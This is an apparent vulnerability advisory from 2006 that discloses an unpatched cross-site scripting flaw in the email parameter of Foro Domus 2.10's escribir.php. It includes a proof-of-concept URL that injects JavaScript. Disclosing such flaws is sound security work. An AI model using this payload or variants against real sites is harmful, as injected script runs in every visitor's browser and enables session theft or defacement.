email XSS Vulnerability in Foro Domus
Summary
- Vulnerability
- email XSS Vulnerability in Foro Domus
- Discovered
- 2006.01.06
- Last Update
- 0 n/a
- ID
- EV0016
- CVE
- CVE-2006-0110
- Risk Level
- low
- Type
- Cross Site Scripting
- Status
- Unpatched
- Vendor
- n/a
- Vulnerable Software
- Foro Domus (http://domus.sourceforge.net/)
- Version
- 2.10
- PoC/Exploit
- Available
- Solution
- Not available
- Discovered by
- Aliaksandr Hartsuyeu (eVuln.com)
Description
Cross Site Scripting found in Foro Domus (http://domus.sourceforge.net/) script.
Vulnerable script: escribir.php
Variable $email isn't properly sanitized. This can be used to post arbitrary script code which will be executed in the browser of every visitor.
PoC/Exploit
Example URL:
http://host/domus/escribir.php? domus=ae29cf4d3f2dc42241e387d39b4126e2&hilo=1&padre=1&categoria=General&n=&usario=username&email=e@';%20alert(123);%20var%20dss='h.co&asunto=blabla&texto=anytext&accion=enviar
Solution.
Solution for "email XSS Vulnerability in Foro Domus" is not available. Check vendor's website for updates.